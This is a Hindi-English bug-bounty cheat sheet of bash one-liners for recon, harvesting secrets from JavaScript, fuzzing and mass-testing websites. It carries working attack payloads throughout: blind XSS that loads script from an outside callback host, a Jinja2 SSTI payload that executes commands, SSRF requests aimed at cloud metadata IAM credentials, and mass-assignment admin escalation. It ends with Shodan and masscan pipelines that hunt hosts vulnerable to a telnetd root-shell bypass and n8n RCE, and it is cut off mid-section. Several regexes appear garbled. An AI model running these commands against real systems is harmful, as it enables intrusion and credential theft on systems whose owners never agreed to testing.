### API Keys from JS```bash
cat js.txt | nuclei -t http/exposures/tokens/ -silent | anew api_keys.txt
cat js.txt | xargs -I@ curl -s @ | grep -oE "(https?://[^"'`\s<>]+)" | sort -u | anew js_urls.txt
### JS में API एंडपॉइंट खोजें```bash
cat js.txt | xargs -I@ curl -s @ | grep -oE "(/api/[^\"\'\`\s\<\>]+|/v[0-9]+/[^\"\'\`\s\<\>]+)" | sort -u
cat js.txt | xargs -I@ curl -s @ | grep -iE "(password|passwd|pwd|secret|api_key|apikey|token|auth)" | sort -u
### JS से AWS कुंजियाँ निकालें```bash
cat js.txt | xargs -I@ curl -s @ | grep -oE "(AKIA[0-9A-Z]{16}|ABIA[0-9A-Z]{16}|ACCA[0-9A-Z]{16}|ASIA[0-9A-Z]{16})" | sort -u | anew aws_keys.txt
cat js.txt | xargs -I@ curl -s @ | grep -oE "AIza[0-9A-Za-z-_]{35}" | sort -u | anew google_api_keys.txt
### JS से Firebase URLs निकालें```bash
cat js.txt | xargs -I@ curl -s @ | grep -oE "https://[a-zA-Z0-9-]+\.firebaseio\.com|https://[a-zA-Z0-9-]+\.firebase\.com" | sort -u | anew firebase_urls.txt
cat js.txt | xargs -I@ curl -s @ | grep -oE "[a-zA-Z0-9.-]+.s3.amazonaws.com|s3://[a-zA-Z0-9.-]+|s3-[a-zA-Z0-9-]+.amazonaws.com/[a-zA-Z0-9.-]+" | sort -u | anew s3_from_js.txt
### JS से आंतरिक IP निकालें```bash
cat js.txt | xargs -I@ curl -s @ | grep -oE "(10\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}|172\.(1[6-9]|2[0-9]|3[0-1])\.[0-9]{1,3}\.[0-9]{1,3}|192\.168\.[0-9]{1,3}\.[0-9]{1,3})" | sort -u | anew internal_ips.txt
cat js.txt | xargs -I@ curl -s @ | grep -oE "https://hooks\.slack\.com/services/T[a-zA-Z0-9_]+/B[a-zA-Z0-9_]+/[a-zA-Z0-9_]+" | sort -u | anew slack_webhooks.txt
### JS से GitHub टोकन निकालें```bash
cat js.txt | xargs -I@ curl -s @ | grep -oE "(ghp_[a-zA-Z0-9]{36}|gho_[a-zA-Z0-9]{36}|ghu_[a-zA-Z0-9]{36}|ghs_[a-zA-Z0-9]{36}|ghr_[a-zA-Z0-9]{36}|github_pat_[a-zA-Z0-9]{22}_[a-zA-Z0-9]{59})" | sort -u | anew github_tokens.txt
cat js.txt | xargs -I@ curl -s @ | grep -oE "-----BEGIN (RSA |EC |DSA |OPENSSH |PGP )?PRIVATE KEY( BLOCK)?-----" | sort -u | anew private_keys_found.txt
### JS से ईमेल पते निकालें```bash
cat js.txt | xargs -I@ curl -s @ | grep -oE "[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}" | sort -u | anew emails_from_js.txt
cat js.txt | xargs -I@ curl -s @ | grep -oE "https?://[a-zA-Z0-9.-]+.[a-zA-Z]{2,}" | sed 's|https?://||' | cut -d'/' -f1 | sort -u | anew subdomains_from_js.txt
### 💀 JS से GraphQL Endpoints निकालें```bash
cat js.txt | xargs -I@ curl -s @ | grep -oE "(graphql|gql|query|mutation)[^\"']*" | grep -oE "/[a-zA-Z0-9/_-]*graphql[a-zA-Z0-9/_-]*" | sort -u | anew graphql_endpoints.txt
cat js.txt | xargs -I@ curl -s @ | grep -oE "eyJ[A-Za-z0-9_-].eyJ[A-Za-z0-9_-].[A-Za-z0-9_-]*" | sort -u | anew jwt_tokens.txt
### 💀 वेबपैक Source Maps खोजें```bash
cat js.txt | sed 's/\.js$/.js.map/' | httpx -silent -mc 200 -ct -match-string "sourcesContent" | anew sourcemaps.txt
cat js.txt | xargs -I@ curl -s @ | grep -oE "https://discord\.com/api/webhooks/[0-9]+/[A-Za-z0-9_-]+" | sort -u | anew discord_webhooks.txt
### 💀 JS में छिपे हुए प्रशासनिक मार्ग खोजें```bash
cat js.txt | xargs -I@ curl -s @ | grep -oE "[\"\'][/][a-zA-Z0-9_/-]*(admin|dashboard|manage|config|settings|internal|private|debug|api/v[0-9])[a-zA-Z0-9_/-]*[\"\']" | tr -d "\"'" | sort -u | anew hidden_routes.txt
cat urls.txt | gf xss | uro | qsreplace '">' | dalfox pipe --silence --skip-bav
### Blind XSS के साथ Callback```bash
cat urls.txt | gf xss | qsreplace '"><script src=https://xss.report/c/YOURID></script>' | httpx -silent
echo target.com | waybackurls | gf xss | uro | httpx -silent | qsreplace '">' | airixss -payload "confirm(1)"
### Knoxss API```bash
cat urls.txt | gf xss | uro | xargs -I@ curl -s "https://knoxss.me/api/v3" -d "target=@" -H "X-API-KEY: YOUR_KEY"
cat js.txt | xargs -I@ bash -c 'curl -s @ | grep -E "(document.(location|URL|cookie|domain|referrer)|innerHTML|outerHTML|eval(|.write()" && echo "--- @ ---"'
### Nuclei DAST के साथ बड़े पैमाने पर XSS```bash
cat urls.txt | httpx -silent | nuclei -dast -t dast/vulnerabilities/xss/ -rl 50
cat urls.txt | kxss 2>/dev/null | grep -v "Not Reflected" | anew reflected_params.txt
### XSS पॉलीग्लॉट परीक्षण```bash
cat urls.txt | gf xss | qsreplace "jaVasCript:/*-/*`/*\`/*'/*\"/**/(/* */oNcLiCk=alert() )//" | httpx -silent -mr "alert"
cat urls.txt | gf sqli | uro | anew sqli.txt && sqlmap -m sqli.txt --batch --random-agent --level 2 --risk 2
### त्रुटि-आधारित पहचान```bash
cat urls.txt | gf sqli | qsreplace "'" | httpx -silent -ms "error|sql|syntax|mysql|postgresql|oracle" | anew sqli_errors.txt
cat urls.txt | gf sqli | qsreplace "1' AND SLEEP(5)-- -" | httpx -silent -timeout 10 | anew time_based.txt
### Ghauri Scan```bash
cat sqli.txt | xargs -I@ ghauri -u @ --batch --level 3
cat urls.txt | gf sqli | qsreplace "1 UNION SELECT NULL,NULL,NULL-- -" | httpx -silent -mc 200
### Boolean-आधारित पहचान```bash
cat urls.txt | gf sqli | qsreplace "1' AND '1'='1" | httpx -silent -mc 200 | anew boolean_sqli.txt
cat urls.txt | qsreplace '{"$gt":""}' | httpx -silent -mc 200 | anew nosqli.txt cat urls.txt | qsreplace "admin'||'1'=='1" | httpx -silent | anew nosqli.txt
## 🌐 SSRF और SSTI
### Interactsh के साथ SSRF```bash
cat urls.txt | gf ssrf | qsreplace "https://YOURBURP.oastify.com" | httpx -silent
cat urls.txt | qsreplace "http://169.254.169.254/latest/meta-data/" | httpx -silent -match-string "ami-id"
### SSTI का पता लगाना```bash
cat urls.txt | gf ssti | qsreplace "{{7*7}}" | httpx -silent -match-string "49" | anew ssti_vuln.txt
cat urls.txt | qsreplace '${77}' | httpx -silent -mr "49" && cat urls.txt | qsreplace '<%= 77 %>' | httpx -silent -mr "49"
### पूर्ण SSRF श्रृंखला```bash
cat params.txt | grep -iE "(url|uri|path|src|dest|redirect|redir|return|next|target|out|view|page|show|fetch|load)" | qsreplace "http://YOURSERVER" | httpx -silent
cat urls.txt | gf ssrf | qsreplace "http://7f000001.burpcollaborator.net" | httpx -silent
### Jinja2 SSTI```bash
cat urls.txt | qsreplace "{{config.__class__.__init__.__globals__['os'].popen('id').read()}}" | httpx -silent
katana -u https://target.com -d 10 -jc -kf all -aff -silent | anew crawl.txt
### Gospider पूर्ण क्रॉल```bash
gospider -s https://target.com -c 20 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico)" | anew
echo https://target.com | hakrawler -d 5 -subs -u | anew hakrawler.txt
### ParamSpider खोज```bash
paramspider -d target.com --exclude woff,css,js,png,svg,jpg -o params.txt
waymore -i target.com -mode U -oU urls.txt
### हेडलेस ब्राउज़र के साथ क्रॉल करें```bash
katana -u https://target.com -headless -d 5 -jc -silent | anew headless_crawl.txt
katana -u https://target.com -f qurl -silent | grep "?" | anew forms.txt
### 💀 Katana बहु-लक्ष्य गहन क्रॉल + JS पार्सिंग```bash
# ☠️ Crawl multiple targets with JavaScript parsing and form extraction
cat alive.txt | katana -d 8 -jc -kf all -aff -ef woff,css,png,svg,jpg,woff2,jpeg,gif,ico -c 50 -p 20 -silent -o katana_multi.txt
gospider -S alive.txt -c 30 -d 5 -t 20 --sitemap --robots --js -a -w --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|svg)" -o gospider_output && cat gospider_output/* | grep -oE 'https?://[^"]+' | sort -u | anew gospider_urls.txt
### 💀 Hakrawler + Wayback + GAU संयुक्त क्रॉलर```bash
# ☠️ Triple source crawling: live + wayback + gau
echo target.com | hakrawler -d 5 -subs -u > hakrawler.txt && waybackurls target.com > wayback.txt && gau target.com > gau.txt && cat hakrawler.txt wayback.txt gau.txt | sort -u | httpx -silent | anew all_crawled.txt
katana -u https://target.com -headless -d 6 -jc -aff -xhr -form -timeout 15 -silent -nc -c 20 | anew headless_interactive.txt
### 💀 कैरिडी पूर्ण क्रॉल गुप्त डिटेक्शन के साथ```bash
# ☠️ Crawl with built-in secrets/endpoints/parameters extraction
cariddi -u https://target.com -d 5 -s -e -ext 1 -plain -t 50 -c 20 | tee cariddi_results.txt && grep -E "(api|secret|key|token|pass|auth)" cariddi_results.txt | anew secrets_found.txt
cat domains.txt | parallel -j 10 "katana -u https://{} -d 5 -jc -silent" | uro | anew parallel_crawl.txt
### 💀 Katana + Gospider + LinkFinder श्रृंखला```bash
# ☠️ Combined crawling + JS endpoint extraction pipeline
katana -u https://target.com -d 5 -jc -silent | grep "\.js$" | httpx -silent | xargs -I@ bash -c 'curl -s @ | grep -oE "(\/[a-zA-Z0-9_\-\/]+)" | sort -u' | anew js_endpoints.txt && gospider -s https://target.com -d 5 -c 10 --js -q | grep -oE 'https?://[^"]+' | anew combined_crawl.txt
katana -u https://target.com -d 6 -jc -kf all -aff -silent | tee crawl_output.txt | grep -E ".(php|asp|aspx|jsp|do|action)(?|$)" | nuclei -t /root/nuclei-templates/ -severity high,critical -silent -o crawl_vulns.txt
### 💀 Waymore + Katana ऐतिहासिक + लाइव मर्ज```bash
# ☠️ Merge historical URLs with live crawl for maximum coverage
waymore -i target.com -mode U -oU waymore_urls.txt && katana -u https://target.com -d 5 -jc -aff -silent -o katana_live.txt && cat waymore_urls.txt katana_live.txt | uro | httpx -silent -mc 200,301,302,403 | anew merged_crawl.txt
(gospider -s https://target.com -d 3 -c 10 -q; hakrawler -url https://target.com -d 3; katana -u https://target.com -d 3 -jc -silent) | sort -u | unfurl -u keys | sort | uniq -c | sort -rn | head -100 | anew top_params.txt
---
## 🔑 पैरामीटर खोज
### X8 छिपे पैरामीटर```bash
cat urls.txt | httpx -silent | xargs -I@ x8 -u @ -w params.txt
arjun -i urls.txt -oT arjun_params.txt --stable
### कस्टम पैराम ब्रूटफ़ोर्स```bash
cat urls.txt | sed 's/$/\?FUZZ=test/' | ffuf -w params.txt:FUZZ -u FUZZ -mc 200,301,302 -ac
cat js.txt | xargs -I@ curl -s @ | grep -oE "[?&][a-zA-Z0-9_]+=" | cut -d'=' -f1 | tr -d '?&' | sort -u
### पैरामीटर प्रदूषण परीक्षण```bash
cat urls.txt | qsreplace 'param=value1¶m=value2' | httpx -silent -mc 200
ffuf -u https://target.com/FUZZ -w wordlist.txt -mc 200,301,302,403 -ac -c -t 100
### 💀 पुनरावर्ती फ़ज़िंग - ffuf डीप स्कैन```bash
# ☠️ Recursive directory bruteforce with depth 3
ffuf -u https://target.com/FUZZ -w wordlist.txt -recursion -recursion-depth 3 -mc 200,301,302,403 -ac -c -t 100 -o ffuf_recursive.json -of json
feroxbuster -u https://target.com -w wordlist.txt -d 5 -L 4 --auto-tune -C 404,500 --smart -o ferox_results.txt
### 💀 Feroxbuster बहु-लक्ष्य पुनरावर्ती```bash
# ☠️ Scan multiple targets from file with recursion
cat alive.txt | xargs -I@ feroxbuster -u @ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -d 3 -t 50 --no-state -q -o [email protected]
ffuf -u https://target.com/FUZZ -w wordlist.txt -mc 200,301,302 -ac -c -t 100 -o dirs.json -of json && cat dirs.json | jq -r '.results[].url' | xargs -I@ feroxbuster -u @ -w wordlist.txt -x php,asp,aspx,jsp,html,js -d 2 -t 30 -q
### 💀 एक्सटेंशन मास स्कैन के साथ पुनरावर्ती फ़ज़िंग```bash
# ☠️ ffuf recursive with multiple extensions + backup files
ffuf -u https://target.com/FUZZ -w wordlist.txt -recursion -recursion-depth 2 -e .php,.asp,.aspx,.jsp,.html,.js,.json,.xml,.bak,.old,.txt,.conf,.config,.zip,.tar.gz -mc 200,301,302,403,500 -ac -t 80 -rate 100 -o recursive_ext.json
feroxbuster -u https://target.com -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,asp,aspx,jsp,bak,old,zip -d 4 -t 100 -L 5 --parallel 10 --dont-extract-links -C 404 -o ferox_parallel.txt
### 💀 Feroxbuster मौन पुनरावर्ती + हेडर```bash
# ☠️ Stealth recursive scan with custom headers and rate limiting
feroxbuster -u https://target.com -w wordlist.txt -d 3 -t 30 -r -k --random-agent -H "X-Forwarded-For: 127.0.0.1" -H "X-Custom-IP-Authorization: 127.0.0.1" --rate-limit 50 -C 400,401,403,404,500 -q -o ferox_stealth.txt
feroxbuster -u https://target.com -w wordlist.txt -d 5 --extract-links --collect-words --collect-backups -x php,html,js,json -t 50 -o ferox_extracted.txt
### 💀 Feroxbuster पुनः प्रारंभ + आकार द्वारा फ़िल्टर```bash
# ☠️ Smart filtering by response size and resumable state
feroxbuster -u https://target.com -w wordlist.txt -d 4 -S 0 -W 1 --filter-status 404,500 --filter-words 20 --filter-lines 5 --resume-from ferox_state.json --state-file ferox_state.json -o ferox_filtered.txt
feroxbuster -u https://target.com/api -w /usr/share/seclists/Discovery/Web-Content/api/api-endpoints.txt -d 3 -x json -t 50 -H "Accept: application/json" -H "Content-Type: application/json" --dont-extract-links -m GET,POST -o ferox_api.txt
### Git एक्सपोज़र```bash
cat urls.txt | httpx -silent -path /.git/config -mc 200 -ms "[core]" | anew git_exposed.txt
cat urls.txt | httpx -silent -path /.env,/config.php,/wp-config.php.bak,/.htaccess,/server-status -mc 200 | anew sensitive.txt
### बैकअप फ़ाइलें```bash
cat urls.txt | sed 's/$/.bak/' | httpx -silent -mc 200 && cat urls.txt | sed 's/$/.old/' | httpx -silent -mc 200
cat urls.txt | httpx -silent -path /swagger.json,/openapi.json,/api-docs,/swagger-ui.html -mc 200 | anew api_docs.txt
### स्रोत कोड लीक```bash
cat urls.txt | httpx -silent -path /.svn/entries,/.bzr/README,/CVS/Root -mc 200 | anew vcs_exposed.txt
cat alive.txt | httpx -silent -path /config.json,/config.yaml,/config.yml,/settings.json,/app.config -mc 200 | anew configs.txt
### डेटाबेस फ़ाइलें```bash
cat alive.txt | httpx -silent -path /database.sql,/db.sql,/backup.sql,/dump.sql -mc 200 | anew db_files.txt
nuclei -l alive.txt -t /nuclei-templates/ -severity critical,high,medium -c 50 -rl 150 -o nuclei_results.txt
### CVE स्कैनिंग```bash
nuclei -l alive.txt -t cves/ -severity critical,high -c 30 -o cve_results.txt
subfinder -d target.com -silent | httpx -silent | nuclei -t takeovers/ -c 50
### उजागर पैनल```bash
nuclei -l alive.txt -t exposed-panels/ -c 50 | anew panels.txt
nuclei -l alive.txt -t misconfiguration/ -severity high,critical | anew misconfig.txt
### DAST Mode```bash
nuclei -l urls.txt -dast -rl 10 -c 3 -o dast_results.txt
nuclei -l alive.txt -tags cve,rce,sqli,xss -severity critical,high -o tagged_results.txt
### नेटवर्क स्कैनिंग```bash
nuclei -l ips.txt -t network/ -c 25 -o network_vulns.txt
cat urls.txt | httpx -silent -path /graphql -mc 200 | xargs -I@ curl -s @ -H "Content-Type: application/json" -d '{"query":"{__schema{types{name}}}"}' | grep -v "error"
### REST API गणना```bash
cat alive.txt | httpx -silent -path /api/v1,/api/v2,/api/v3,/api/swagger.json -mc 200 | anew api_endpoints.txt
cat urls.txt | httpx -silent | katana -d 3 -silent | grep -oE "eyJ[A-Za-z0-9_-].eyJ[A-Za-z0-9_-].[A-Za-z0-9_-]*" | anew jwts.txt
### API Key रिसाव```bash
cat urls.txt | httpx -silent | katana -d 3 -silent | grep -oiE "(api[_-]?key|apikey|api_secret)[=:]['\"]?[a-zA-Z0-9]{16,}['\"]?" | anew api_keys.txt
cat api_endpoints.txt | httpx -silent -mc 200 -fc 401,403 | anew no_auth_endpoints.txt
### दर सीमा परीक्षण```bash
for i in {1..100}; do curl -s -o /dev/null -w "%{http_code}\n" "https://target.com/api/endpoint"; done | sort | uniq -c
cat urls.txt | grep -oE "(id|user_id|account_id|uid)=[0-9]+" | sed 's/=[0-9]*/=FUZZ/' | sort -u | anew bola_candidates.txt
### 💀 ffuf के साथ API एंडपॉइंट फ़ज़िंग```bash
# ☠️ Fuzz API endpoints with common paths and methods
ffuf -u https://target.com/api/FUZZ -w /usr/share/seclists/Discovery/Web-Content/api/api-endpoints.txt -mc 200,201,204,301,302,401,403,405 -ac -c -t 100 -H "Content-Type: application/json" -o api_fuzz.json -of json
ffuf -u https://target.com/api/vFUZZ/users -w <(seq 1 20) -mc 200,201,401,403 -ac -c && ffuf -u https://target.com/FUZZ/users -w <(echo -e "api\nv1\nv2\nv3\nv4\napi/v1\napi/v2\napi/v3\napi/internal\napi/private\napi/admin\napi/dev\napi/test\napi/staging\napi/beta") -mc 200,201,401,403 -ac -c
### 💀 REST API विधियाँ Fuzzing```bash
# ☠️ Test all HTTP methods on API endpoints
cat api_endpoints.txt | while read url; do for method in GET POST PUT DELETE PATCH OPTIONS HEAD TRACE CONNECT; do CODE=$(curl -s -o /dev/null -w "%{http_code}" -X $method "$url" -H "Content-Type: application/json"); echo "$method $url - $CODE"; done; done | grep -vE " - (404|405)$" | anew api_methods.txt
ffuf -u https://target.com/FUZZ -w <(echo -e "graphql\ngraphiql\nplayground\nconsole\nquery\ngql\nv1/graphql\nv2/graphql\napi/graphql\napi/gql") -mc 200,400 -ac -c -H "Content-Type: application/json" -d '{"query":"{__typename}"}' -X POST -o graphql_endpoints.json
### 💀 API Parameter Fuzzing```bash
# ☠️ Discover hidden API parameters with arjun + ffuf combo
cat api_endpoints.txt | xargs -I@ -P5 arjun -u @ -m POST -oT arjun_params.txt && cat api_endpoints.txt | xargs -I@ ffuf -u @?FUZZ=test -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -mc 200,201,400,500 -ac -c -t 50 -o param_fuzz.json
cat api_endpoints.txt | while read url; do curl -s -o /dev/null -w "%{http_code} - $url\n" "$url" -H "X-Originating-IP: 127.0.0.1" -H "X-Forwarded-For: 127.0.0.1" -H "X-Remote-IP: 127.0.0.1" -H "X-Remote-Addr: 127.0.0.1" -H "X-Custom-IP-Authorization: 127.0.0.1"; done | grep "^200" | anew auth_bypass.txt
### 💀 OpenAPI/Swagger फज़िंग```bash
# ☠️ Find and extract endpoints from OpenAPI specs
ffuf -u https://target.com/FUZZ -w <(echo -e "swagger.json\nswagger.yaml\nopenapi.json\nopenapi.yaml\napi-docs\napi-docs.json\nswagger-ui.html\nswagger/v1/swagger.json\nv1/swagger.json\nv2/swagger.json\nv3/swagger.json\napi/swagger.json\ndocs/api\napi/docs") -mc 200 -ac -c | tee swagger_found.txt | xargs -I@ curl -s @ | jq -r '.paths | keys[]' 2>/dev/null | anew swagger_paths.txt
cat api_endpoints.txt | httpx -silent -mc 200,201,401,403 | nuclei -dast -t dast/vulnerabilities/ -H "Content-Type: application/json" -rl 20 -c 5 -o api_nuclei_dast.txt
### 💀 API सामूहिक असाइनमेंट फजिंग```bash
# ☠️ Test for mass assignment vulnerabilities
cat api_endpoints.txt | grep -iE "(user|account|profile|register|signup|update)" | xargs -I@ curl -s -X POST @ -H "Content-Type: application/json" -d '{"admin":true,"role":"admin","isAdmin":true,"is_admin":1,"privilege":"admin","access_level":9999}' -o /dev/null -w "%{http_code} - @\n" | grep -E "^(200|201|204)" | anew mass_assignment.txt
cat js.txt | xargs -I@ curl -s @ | grep -oE "["']/(api|v[0-9])/[a-zA-Z0-9/_-]+["']" | tr -d ""'" | sort -u > custom_api_wordlist.txt && ffuf -u https://target.com/FUZZ -w custom_api_wordlist.txt -mc 200,201,204,401,403,500 -ac -c -t 80 -H "Authorization: Bearer null" -o custom_api_fuzz.json
## ☁️ क्लाउड सुरक्षा
### AWS S3 Bucket Finder```bash
cat urls.txt | grep -oE "[a-zA-Z0-9.-]+\.s3\.amazonaws\.com" | anew s3_buckets.txt
cat urls.txt | grep -oE "s3://[a-zA-Z0-9.-]+" | anew s3_buckets.txt
cat s3_buckets.txt | xargs -I@ sh -c 'aws s3 ls s3://@ --no-sign-request 2>/dev/null && echo "OPEN: @"'
### Firebase Database```bash
cat urls.txt | grep -oE "[a-zA-Z0-9-]+\.firebaseio\.com" | xargs -I@ curl -s @/.json | grep -v "null"
cat urls.txt | grep -oE "[a-zA-Z0-9-]+.blob.core.windows.net" | anew azure_blobs.txt
### GCP Storage```bash
cat urls.txt | grep -oE "storage\.googleapis\.com/[a-zA-Z0-9-]+" | anew gcp_buckets.txt
cat urls.txt | gf ssrf | qsreplace "http://169.254.169.254/latest/meta-data/iam/security-credentials/" | httpx -silent -ms "AccessKeyId"
### क्लाउड क्रेडेंशियल फ़ाइलें```bash
cat alive.txt | httpx -silent -path /.aws/credentials,/.docker/config.json,/kubeconfig -mc 200 | anew cloud_creds.txt
#!/bin/bash domain=$1 mkdir -p $domain && cd $domain
subfinder -d $domain -all -silent | anew subs.txt amass enum -passive -d $domain | anew subs.txt assetfinder -subs-only $domain | anew subs.txt
cat subs.txt | httpx -silent -threads 100 | anew alive.txt
cat alive.txt | katana -d 5 -jc -silent | anew urls.txt cat alive.txt | waybackurls | anew urls.txt cat alive.txt | gau --threads 50 | anew urls.txt
cat urls.txt | gf xss | anew xss.txt cat urls.txt | gf sqli | anew sqli.txt cat urls.txt | gf ssrf | anew ssrf.txt cat urls.txt | gf lfi | anew lfi.txt
nuclei -l alive.txt -t /nuclei-templates/ -severity critical,high -o vulns.txt
### XSS Hunter Script```bash
#!/bin/bash
target=$1
echo $target | waybackurls | anew urls.txt
echo $target | gau | anew urls.txt
cat urls.txt | gf xss | uro | qsreplace '">' | airixss -payload "alert(1)" | tee xss_found.txt
cat urls.txt | gf xss | uro | dalfox pipe --silence | tee -a xss_found.txt
#!/bin/bash target=$1 mkdir -p $target/api && cd $target/api
cat ../alive.txt | httpx -silent -path /api,/api/v1,/api/v2,/swagger.json,/openapi.json | anew api_endpoints.txt
cat ../js.txt | xargs -I@ curl -s @ | grep -oE "(/api/[^"'`\s<>]+)" | sort -u | anew js_api_endpoints.txt
cat ../alive.txt | httpx -silent -path /graphql,/graphiql,/playground -mc 200 | anew graphql.txt
echo "[+] API recon complete!"
---
## ⚙️ Bash फ़ंक्शन्स
अपने `.bashrc` या `.zshrc` में जोड़ें:```bash
# Quick recon
recon() {
subfinder -d $1 -silent | anew subs.txt
assetfinder -subs-only $1 | anew subs.txt
cat subs.txt | httpx -silent | anew alive.txt
echo "[+] Found $(wc -l < alive.txt) alive hosts"
}
# XSS scan
xscan() {
echo $1 | waybackurls | gf xss | uro | qsreplace '"><svg onload=confirm(1)>' | airixss -payload "confirm(1)"
}
# SQLi scan
sqscan() {
echo $1 | waybackurls | gf sqli | uro | qsreplace "'" | httpx -silent -ms "error|syntax|mysql"
}
# JS recon
jsrecon() {
echo $1 | waybackurls | grep -iE "\.js$" | httpx -silent | nuclei -t exposures/
}
# Nuclei quick
nuke() {
echo $1 | httpx -silent | nuclei -t /nuclei-templates/ -severity critical,high
}
# Full pipeline
fullrecon() {
recon $1
cat alive.txt | katana -d 3 -jc -silent | anew urls.txt
cat urls.txt | gf xss | anew xss.txt
cat urls.txt | gf sqli | anew sqli.txt
nuclei -l alive.txt -t /nuclei-templates/ -severity critical,high -o vulns.txt
}
# Certificate search
cert() {
curl -s "https://crt.sh/?q=%25.$1&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u
}
# Parameter extraction
params() {
echo $1 | waybackurls | grep "=" | uro | unfurl keys | sort -u
}
# Subdomain takeover check
takeover() {
subfinder -d $1 -silent | httpx -silent | nuclei -t takeovers/ -c 50
}
# Port scan
portscan() {
naabu -host $1 -top-ports 1000 -silent | httpx -silent | anew $1_ports.txt
}
# Screenshot all
screenshot() {
cat $1 | xargs -I@ gowitness single @ -o screenshots/
}
💀 GNU InetUtils Telnetd प्रमाणीकरण बाईपास - तत्काल रूट शेल! सक्रिय शोषण के तहत! 💀
shodan search "port:23 telnet" --fields ip_str,port,org | awk '{print $1":"$2}' | anew telnet_targets.txt
#### ⚡ 2. Nmap Telnet Service Detection + Version```bash
# 💀 Enumerate telnet services with version detection
nmap -p23 -sV --script=telnet-ntlm-info -iL targets.txt -oG - | grep "23/open" | awk '{print $2}' | anew telnet_open.txt
masscan -p23 --rate=10000 -iL ip_ranges.txt -oG masscan_telnet.txt && cat masscan_telnet.txt | grep "23/open" | awk '{print $4}' | anew telnet_alive.txt
#### ⚡ 4. GNU InetUtils Telnetd Fingerprint```bash
# 💀 Identify GNU inetutils-telnetd specifically (vulnerable)
cat telnet_targets.txt | xargs -P30 -I@ sh -c 'echo "" | timeout 3 nc -v @ 23 2>&1 | grep -qi "GNU\|inetutils\|Ubuntu\|Debian" && echo "[GNU TELNETD] @"' | tee gnu_telnetd.txt
cat telnet_targets.txt | xargs -P20 -I@ sh -c 'echo -e "\xff\xfa\x27\x00\x00USER\x01-f\xff\xf0" | timeout 3 nc @ 23 2>/dev/null | grep -q "login|root|#" && echo "[CVE-2026-24061 POTENTIAL] @"' | tee cve_2026_24061_potential.txt
#### ⚡ 6. Nuclei CVE-2026-24061 स्कैनर```bash
# 💀 Mass scan with Nuclei template
cat telnet_targets.txt | nuclei -t http/cves/2026/CVE-2026-24061.yaml -c 50 -o cve_2026_24061_vuln.txt
cat telnet_targets.txt | xargs -P50 -I@ sh -c 'echo "" | timeout 3 nc @ 23 2>&1 | head -3' | tee telnet_banners.txt | grep -iE "(inetutils|GNU|2.[0-7])" | anew potentially_vuln_versions.txt
#### ⚡ 8. सबनेट टेलनेट हंटर```bash
# 💀 Discover telnet in internal/external subnets
prips 192.168.0.0/16 | xargs -P100 -I@ sh -c 'timeout 1 nc -zv @ 23 2>&1 | grep -q "succeeded\|open" && echo @' | anew internal_telnet.txt
nmap -p23 -sV -O --script=telnet-encryption -iL telnet_targets.txt -oX telnet_scan.xml && cat telnet_scan.xml | grep -oE "(Debian|Ubuntu|Kali|Linux)" | sort | uniq -c | sort -rn
#### ⚡ 10. पूर्ण CVE-2026-24061 रीकॉन पाइपलाइन```bash
# 💀 Complete telnet vulnerability assessment pipeline
TARGET_RANGE="192.168.1.0/24"; mkdir -p telnet_recon && cd telnet_recon; masscan -p23 --rate=5000 $TARGET_RANGE -oG masscan.txt; cat masscan.txt | grep "23/open" | awk '{print $4}' > telnet_hosts.txt; cat telnet_hosts.txt | xargs -P30 -I@ sh -c 'echo "" | timeout 3 nc @ 23 2>&1 | head -5' > banners.txt; grep -liE "(GNU|inetutils|ubuntu|debian)" banners.txt | xargs -I@ basename @ .txt > gnu_telnetd_hosts.txt; echo "[+] Found $(wc -l < telnet_hosts.txt) telnet | $(wc -l < gnu_telnetd_hosts.txt) GNU inetutils (potentially vulnerable)"
⚠️ प्रभावित: GNU InetUtils telnetd 1.9.3 - 2.7 (Debian/Ubuntu/Kali/Trisquel) ✅ समाधान: GNU InetUtils 2.8+ पर अपडेट करें या telnetd अक्षम करें और SSH का उपयोग करें
💀 n8n Workflow Automation में गंभीर अप्रमाणित RCE - 100,000+ सर्वर प्रभावित! CISA KEV में जोड़ा गया 💀
shodan search "n8n" --fields ip_str,port,hostnames | awk '{print "https://"$1":"$2}' | httpx -silent | anew n8n_targets.txt
#### ⚡ n8n इंस्टॉलेशन को फ़िंगरप्रिंट करें```bash
cat alive.txt | httpx -silent -match-string "n8n" -match-string "workflow" -title | grep -i "n8n" | anew n8n_instances.txt
cat n8n_targets.txt | xargs -I@ -P20 sh -c 'curl -s -o /dev/null -w "%{http_code}" -X POST @/webhook-test/test -H "Content-Type: multipart/form-data" 2>/dev/null | grep -qE "^(200|400|500)$" && echo "POTENTIAL: @"' | tee n8n_webhook_check.txt
#### ⚡ Content-Type भ्रम का पता लगाना```bash
curl -s -X POST "https://target.com/webhook/ID" -H "Content-Type: application/json" --data '{"test":1}' -w "\n%{http_code}" | tail -1 | grep -qE "^(200|400)$" && echo "Webhook accepts requests"
cat n8n_targets.txt | httpx -silent -path /rest/settings -match-regex '"versionCli":"[0-9]+.[0-9]+.[0-9]+"' | anew n8n_versions.txt
#### ⚡ Nuclei Template Check के लिए CVE-2026-21858```bash
nuclei -l n8n_targets.txt -t http/cves/2026/CVE-2026-21858.yaml -c 30 -o ni8mare_vuln.txt
⚠️ प्रभावित: n8n < 1.121.0 | ✅ सुधार: n8n 1.121.0+ पर अपडेट करें
💀 n8n में Git Node के माध्यम से प्रमाणित RCE - क्लाउड और स्व-होस्टेड प्रभावित! 💀
cat n8n_targets.txt | httpx -silent -path /rest/node-types -match-string "git" | anew n8n_git_enabled.txt
#### ⚡ n8n प्रमाणीकरण एंडपॉइंट की जाँच करें```bash
cat n8n_targets.txt | httpx -silent -path /rest/login -mc 200,401 -title | anew n8n_auth_endpoints.txt
⚠️ प्रभावित: n8n < 1.121.3 | ✅ समाधान: n8n 1.121.3+ पर अपडेट करें
💀 पुराने D-Link DSL राउटर्स में कमांड इंजेक्शन - सक्रिय शोषण के तहत! 💀
shodan search "D-Link DSL" --fields ip_str,port | awk '{print $1":"$2}' | httpx -silent | anew dlink_dsl_targets.txt
#### ⚡ असुरक्षित dnscfg.cgi Endpoint का पता लगाएँ```bash
